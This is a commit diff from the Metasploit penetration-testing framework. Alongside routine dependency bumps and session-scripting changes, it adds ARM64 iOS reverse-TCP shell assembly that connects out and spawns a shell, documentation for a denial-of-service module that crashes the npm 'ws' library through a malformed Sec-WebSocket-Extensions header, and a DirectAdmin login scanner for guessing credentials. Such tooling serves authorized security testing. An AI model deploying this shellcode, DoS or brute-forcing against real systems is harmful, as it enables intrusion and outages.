Resolve conflict

Author: jhart-r7

Gemfile.lock

@@ -17,9 +17,9 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.19)
+      metasploit-payloads (= 1.3.23)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.3.2)
+      metasploit_payloads-mettle (= 0.3.3)
       mqtt
       msgpack
       nessus_rest
@@ -178,7 +178,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.19)
+    metasploit-payloads (1.3.23)
     metasploit_data_models (2.0.15)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -189,7 +189,7 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.3.2)
+    metasploit_payloads-mettle (0.3.3)
     method_source (0.9.0)
     mini_portile2 (2.3.0)
     minitest (5.10.3)

documentation/modules/auxiliary/dos/http/ws_dos.md

@@ -0,0 +1,57 @@
+## Vulnerable Application
+ws < 1.1.5 || (2.0.0 , 3.3.1)
+https://nodesecurity.io/advisories/550
+
+## Vulnerable Analysis
+This module exploits a Denial of Service vulnerability in npm module "ws".
+By sending a specially crafted value of the Sec-WebSocket-Extensions header 
+on the initial WebSocket upgrade request, the ws component will crash.
+
+## Verification Steps
+1. Start the vulnerable server using the sample server code below `node server.js`
+2. Start `msfconsole`
+3. `use auxiliary/dos/http/ws_dos`
+4. `set RHOST <IP>`
+5. `run`
+6. The server should crash
+
+## Options
+None.
+
+## Scenarios
+
+## Server output from crash
+```
+/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40
+    paramsList.push(parsedParams);
+               ^
+
+TypeError: paramsList.push is not a function
+    at value.split.forEach (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:40:16)
+    at Array.forEach (<anonymous>)
+    at Object.parse (/Users/sonatype/Downloads/node_modules/ws/lib/Extensions.js:15:20)
+    at WebSocketServer.completeUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:230:30)
+    at WebSocketServer.handleUpgrade (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:197:10)
+    at Server.WebSocketServer._ultron.on (/Users/sonatype/Downloads/node_modules/ws/lib/WebSocketServer.js:87:14)
+    at emitThree (events.js:136:13)
+    at Server.emit (events.js:217:7)
+    at onParserExecuteCommon (_http_server.js:495:14)
+    at onParserExecute (_http_server.js:450:3)
+```
+
+## Sample server
+```
+const WebSocket = require('ws');
+const wss = new WebSocket.Server(
+{ port: 3000 }
+);
+wss.on('connection', function connection(ws) {
+console.log('connected');
+ws.on('message', function incoming(message)
+{ console.log('received: %s', message); }
+);
+ws.on('error', function (err)
+{ console.error(err); }
+);
+});
+```

external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s

@@ -0,0 +1,72 @@
+.equ SYS_SOCKET, 0x61
+.equ SYS_CONNECT, 0x62
+.equ SYS_DUP2, 0x5a
+.equ SYS_EXECVE, 0x3b
+.equ SYS_EXIT, 0x01
+
+.equ AF_INET, 0x2
+.equ SOCK_STREAM, 0x1
+
+.equ STDIN, 0x0
+.equ STDOUT, 0x1
+.equ STDERR, 0x2
+
+.equ IP, 0x0100007f
+.equ PORT, 0x5C11
+
+_start:
+        // sockfd = socket(AF_INET, SOCK_STREAM, 0)
+        mov    x0, AF_INET
+        mov    x1, SOCK_STREAM
+        mov    x2, 0
+        mov    x16, SYS_SOCKET
+        svc    0
+        mov    x3, x0
+
+        // connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
+        adr    x1, sockaddr
+        mov    x2, 0x10
+        mov    x16, SYS_CONNECT
+        svc    0
+        cbnz   w0, exit
+
+        // dup2(sockfd, STDIN) ...
+        mov    x0, x3
+        mov    x2, 0
+        mov    x1, STDIN
+        mov    x16, SYS_DUP2
+        svc    0
+        mov    x1, STDOUT
+        mov    x16, SYS_DUP2
+        svc    0
+        mov    x1, STDERR
+        mov    x16, SYS_DUP2
+        svc    0
+
+        // execve('/system/bin/sh', NULL, NULL)
+        adr    x0, shell
+        mov    x2, 0
+        str    x0, [sp, 0]
+        str    x2, [sp, 8]
+        mov    x1, sp
+        mov    x16, SYS_EXECVE
+        svc    0
+
+exit:
+        mov    x0, 0
+        mov    x16, SYS_EXIT
+        svc    0
+
+.balign 4
+sockaddr:
+        .short AF_INET
+        .short PORT
+        .word  IP
+
+shell:
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+end:
+

lib/metasploit/framework/login_scanner/directadmin.rb

@@ -0,0 +1,119 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      class DirectAdmin < HTTP
+
+        DEFAULT_PORT  = 443 
+        PRIVATE_TYPES = [ :password ]
+
+
+        # Checks if the target is Direct Admin Web Control Panel. The login module should call this.
+        #
+        # @return [Boolean] TrueClass if target is DAWCP, otherwise FalseClass
+        def check_setup
+          login_uri = normalize_uri("#{uri}/CMD_LOGIN")
+          res = send_request({'uri'=> login_uri})
+
+          if res && res.body.include?('DirectAdmin Login')
+            return true
+          end
+
+          false
+        end
+
+
+        # Returns the latest sid from DirectAdmin Control Panel  
+        #
+        # @return [String] The PHP Session ID for DirectAdmin Web Control login
+        def get_last_sid
+          @last_sid ||= lambda {
+            # We don't have a session ID. Well, let's grab one right quick from the login page.
+            # This should probably only happen once (initially).
+            login_uri = normalize_uri("#{uri}/CMD_LOGIN")
+            res = send_request({'uri' => login_uri})
+
+            return '' unless res
+
+            cookies = res.get_cookies
+            @last_sid = cookies.scan(/(session=\w+);*/).flatten[0] || ''
+          }.call
+        end
+
+
+        # Actually doing the login. Called by #attempt_login
+        #
+        # @param username [String] The username to try
+        # @param password [String] The password to try
+        # @return [Hash]
+        #   * :status [Metasploit::Model::Login::Status]
+        #   * :proof [String] the HTTP response body
+        def get_login_state(username, password)
+          # Prep the data needed for login
+          sid       = get_last_sid
+          protocol  = ssl ? 'https' : 'http'
+          peer      = "#{host}:#{port}"
+          login_uri = normalize_uri("#{uri}/CMD_LOGIN")
+
+          res = send_request({
+            'uri' => login_uri,
+            'method' => 'POST',
+            'cookie' => sid,
+            'headers' => {
+              'Referer' => "#{protocol}://#{peer}/#{login_uri}"
+            },
+            'vars_post' => {
+              'username' => username,
+              'password' => password,
+              'referer' => '%2F'
+            }
+          })
+
+          unless res
+            return {:status => Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, :proof => res.to_s}
+          end
+
+          # After login, the application should give us a new SID
+          cookies = res.get_cookies
+          sid = cookies.scan(/(session=\w+);*/).flatten[0] || ''
+          @last_sid = sid # Update our SID
+
+          if res.headers['Location'].to_s.include?('/') && !sid.blank?
+            return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.to_s}
+          end
+
+          {:status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.to_s}
+        end
+
+
+        # Attempts to login to DirectAdmin Web Control Panel. This is called first.
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Result] A Result object indicating success or failure
+        def attempt_login(credential)
+          result_opts = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil,
+            host: host,
+            port: port,
+            protocol: 'tcp',
+            service_name: ssl ? 'https' : 'http'
+          }
+
+          begin
+            result_opts.merge!(get_login_state(credential.public, credential.private))
+          rescue ::Rex::ConnectionError => e
+            # Something went wrong during login. 'e' knows what's up.
+            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e.message)
+          end
+
+          Result.new(result_opts)
+        end
+
+      end
+    end
+  end
+end

lib/msf/base/sessions/hwbridge.rb

@@ -1,7 +1,7 @@
 # -*- coding: binary -*-
 
 require 'msf/base'
-
+require 'msf/base/sessions/scriptable'
 require 'rex/post/hwbridge'
 
 module Msf
@@ -24,6 +24,7 @@ class HWBridge  < Rex::Post::HWBridge::Client
   # This interface supports interactive commands.
   #
   include Msf::Session::Interactive
+  include Msf::Session::Scriptable
 
   #
   # Initialize the HWBridge console

lib/msf/base/sessions/meterpreter.rb

@@ -302,11 +302,15 @@ def desc
   ##
   # :category: Msf::Session::Scriptable implementors
   #
-  # Runs the meterpreter script in the context of a script container
+  # Runs the Meterpreter script or resource file
   #
   def execute_file(full_path, args)
-    o = Rex::Script::Meterpreter.new(self, full_path)
-    o.run(args)
+    # Infer a Meterpreter script by it having an .rb extension
+    if File.extname(full_path) == ".rb"
+      Rex::Script::Meterpreter.new(self, full_path).run(args)
+    else
+      console.load_resource(full_path)
+    end
   end
 
 

lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb

@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_aarch64_Apple_iOS < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'apple_ios'
+    self.base_arch = ARCH_AARCH64
+  end
+end
+
+end
+end
+

lib/msf/base/sessions/scriptable.rb

@@ -164,13 +164,17 @@ def execute_script(script_name, *args)
     else
       full_path = self.class.find_script_path(script_name)
 
-      # No path found?  Weak.
       if full_path.nil?
         print_error("The specified script could not be found: #{script_name}")
-        return true
+        return
+      end
+
+      begin
+        execute_file(full_path, args)
+        framework.events.on_session_script_run(self, full_path)
+      rescue StandardError => e
+        print_error("Could not execute #{script_name}: #{e.class} #{e}")
       end
-      framework.events.on_session_script_run(self, full_path)
-      execute_file(full_path, args)
     end
   end